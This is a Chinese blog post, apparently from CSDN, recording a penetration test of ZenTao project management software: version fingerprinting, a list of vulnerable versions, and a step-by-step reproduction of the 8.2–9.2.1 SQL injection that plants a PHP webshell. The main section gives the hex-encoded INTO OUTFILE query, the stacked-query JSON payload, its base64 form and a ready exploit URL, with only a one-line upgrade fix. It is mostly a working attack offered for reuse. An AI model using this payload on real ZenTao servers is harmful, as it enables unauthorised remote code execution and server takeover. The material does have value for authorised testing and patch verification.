禅道渗透测试记录

最新推荐文章于 2024-04-28 18:28:46 发布
最新推荐文章于 2024-04-28 18:28:46 发布
阅读量951 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/117676942
版权

一、禅道简介

禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。 厂商官网:https://www.zentao.net

二、获取版本

使用/index.php?mode=getconfig获取版本号
注意 有的版本和部署方式可能需要加 zentao eg:ip/zentao/index.php?mode=getconfig

各个版本漏洞

1. 版本<= 12.4.2 存在任意文件上传漏洞(需要要登录) 任意文件上传
2. 禅道 11.6、禅道开源版 9 任意代码执行(需要登录)
3. 11.6 sql注入(需要登录) sql注入
4. 8.2-9.2.1 sql注入getShell

三、漏洞复现

本例只复现 8.2-9.2 需要登录情况下 暂不复现

8.2-9.2.1 sql注入getShell

1.获取物理路径 随意拼接路径报错会爆出物理路径 eg: ip/zentao//gaeag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-760CTOS1-1623080144285)(http://doc.hijishu.cn/server/index.php?s=/api/attachment/visitFile/sign/359e1e068a01cb2bde239bd7eb966813)]

2.使用select 导出shell

使用ASCII hex 编码

select'<?php @eval($_POST[1])?>' into outfile'D:/sys/xampp/zentao/www/xx.php'

路径需要根据物理路径进行改变。

ASCII hex 后得到:
73656c656374273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c6527443a2f7379732f78616d70702f7a656e74616f2f7777772f78782e706870

3.将得到的串放入如下语句 后进行base64

{"orderBy":"order limit 1;SET @SQL=0x73656c656374273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c6527443a2f7379732f78616d70702f7a656e74616f2f7777772f78782e706870;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}
base64 eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDI3M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUwNGY1MzU0NWIzMTVkMjkzZjNlMjcyMDY5NmU3NDZmMjA2Zjc1NzQ2NjY5NmM2NTI3NDQzYTJmNzM3OTczMmY3ODYxNmQ3MDcwMmY3YTY1NmU3NDYxNmYyZjc3Nzc3NzJmNzg3ODJlNzA2ODcwO1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9

4.构造poc
http://ip/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&
param=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDI3M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUwNGY1MzU0NWIzMTVkMjkzZjNlMjcyMDY5NmU3NDZmMjA2Zjc1NzQ2NjY5NmM2NTI3NDQzYTJmNzM3OTczMmY3ODYxNmQ3MDcwMmY3YTY1NmU3NDYxNmYyZjc3Nzc3NzJmNzg3ODJlNzA2ODcwO1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9

注意: 必须添加referer: http://ip/zentao
进行连接 http://ip/zentao/xx.php 即可

修复建议

升至最新版

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关!

烽铃子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
从SQL注入到Getshell:记一次禅道系统的渗透
dengzhasong7076的博客
03-08 1518
此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。 目前确认8.2 - 9.2.1存在问题 确认版本 首先可以通过接口来确认一下当前禅道的版本。 http://example.com/index.php?mode=getconfig SQL注入分析 网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2....
禅道8.2-9.2.1注入GetShell
weixin_33966365的博客
03-06 4126
· 漏洞分析附上某老哥的漏洞分析,来了解下原理。· 漏洞利用查看版本:访问Url:http://127.0.0.1/zentao/index.php?mode=getconfig即可获取禅道的版本号以及一些其他的信息,目前漏洞存在于v8.2~v9.2确定版本号之后,我们就可以尝试GetShell利用漏洞,根据另一个老哥博客提供的***方法获取站点路径然后注入一句话***...
Goby 漏洞发布|禅道 /api.php/v1/users 未授权访问漏洞
最新发布
m0_46699477的博客
04-28 469
禅道是一款开源的项目管理软件,旨在帮助团队高效地进行项目管理和协作。它提供了诸如需求管理、任务管理、缺陷跟踪、文档管理、团队协作等功能,使团队能够更好地组织项目、分配任务、追踪进度并与团队成员进行沟通。禅道/api.php/v1/users存在未授权访问漏洞,攻击者可以未授权在该接口下创建管理员账户并接管后台,进而可能利用其他后台漏洞实现远程代码执行,严重威胁系统安全。
蝉(feng)知(wo)cms
蚁景网安学院
05-07 912
本文原创作者:EDI-VOID原创投稿详情:重金悬赏 | 合天原创投稿等你来!前言前段时间朋友在渗透测试中遇到一个蝉知cms,于是一起审计出了不少漏洞,现在漏洞已经在新的版本中修复正文指...
禅道项目管理系统远程命令执行漏洞
qq_18209847的博客
01-12 1239
禅道项目管理系统远程命令执行漏洞,禅道是第一款国产的开源项目管理软件,它的核心管理思想基于敏捷方法 scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能,在一个软件中就可以将软件研发中的需求、任务、bug、用例、计划、发布等要素有序地跟踪管理起来,完整地覆盖了项目管理的核心流程。
【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用
further_eye的博客
12-21 4615
近年来禅道漏洞频发,从2018年开始,每年都会爆出比较严重的高危漏洞,通过这些高危漏洞均可对服务器造成一定的影响,甚至可以获取服务器的最高权限。
禅道统计测试报告数据
12-26
#1.测试阶段 发现BUG展示 #2.自己算,如下sql需要自己统计数值 #3.测试阶段 发现BUG展示 #4.测试阶段处理BUG情况图 #5.历史Bug遗留(延期处理) #6.自己算,如下sql需要自己统计数值
禅道之测试人员操作
04-01
通过使用测试管理工具,测试人员或开发人员可以更方便地记录和监控每个测试活动、阶段的结果,找出软件的缺陷和错误,记录测试活动中发现的缺陷和改进建议。通过使用测试管理工具,测试用例可以被多个测试活动或阶段...
软件测试工具禅道讲解ppt
08-17
软件测试工具禅道讲解ppt 禅道是国产开源项目管理软件,由青岛易软天创网络科技有限公司开发。禅道软件取的是文化层面的含义,希望通过这两个字来传达我们对管理的理解和思考,传达我们对项目管理的理解和思考。...
禅道测试管理工具
12-04
禅道测试管理工具是一款专为中国软件开发团队设计的开源项目管理软件,它涵盖了软件开发过程中的测试管理、缺陷跟踪、需求管理、文档管理等多个方面,旨在提升团队协作效率和产品质量。这款工具以其易用性、灵活性和...
禅道测试管理软件
10-26
有做测试的小伙伴们,可以下载这个测试管理工具,还不错奥。
禅道项目管理软件8.2.4版本
07-11
禅道集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。 源码包安装文档:http://www.zentao.net/book/zentaopmshelp/101.html
禅道开源版本
03-05
禅道开源版本,官方貌似不提供这个版本了,想用的拿去
禅道项目管理_禅道12.4.2后台管理员权限Getshell复现
weixin_39951419的博客
11-30 470
上方蓝色字体关注我们,一起学安全!作者:口算md5@Timeline Sec本文字数:1508阅读时长:5~6min声明:请勿用作违法用途,否则后果自负0x01 简介禅道是第一款国产的开源项目管理软件,她的核心管理思想基于敏捷方法scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能,在一个软件中就可以将软件研发中的需求、...
禅道项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 3167
禅道是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。
pymssql中执行sql sever为什么会乱码_禅道免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 145
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
【代码审计】后台Getshell的两种常规姿势
04-15 1681
0x00 前言 在早些年刚接触web安全的时候,基础套路都是找注入--找后台--找上传点--找数据库备份--Getshell,然而在代码审计的角度,也存在类似的基本操作。 这里结合代码实例介绍白盒Getshell的两种常规姿势:写入配置文件Getshell、模块安装Getshell。 0x01 环境搭建 Doccms官网:http://www.doccms.com程序源码:D...
禅道项目管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 1万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
禅道 测试用例分组
01-03
禅道是一个项目管理和协作的工具,它提供了测试用例分组的功能。通过测试用例分组,可以将不同的测试用例归类到不同的分组中,方便管理和组织测试用例。 在禅道中,可以通过以下步骤进行测试用例分组: 1. 登录禅道系统,并进入相应的项目。 2. 在左侧导航栏中找到并点击"测试"选项。 3. 在测试管理页面中,找到并点击"用例库"选项。 4. 在用例库页面中,可以看到已有的测试用例分组列表。 5. 点击"新建分组"按钮,输入分组名称,并点击"确定"按钮创建新的测试用例分组。 6. 在新建的测试用例分组中,可以添加、编辑和删除测试用例。 7. 可以通过拖拽的方式将测试用例从一个分组移动到另一个分组中,实现测试用例的重新组织和归类。 通过以上步骤,你可以在禅道中进行测试用例分组,方便管理和组织测试用例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值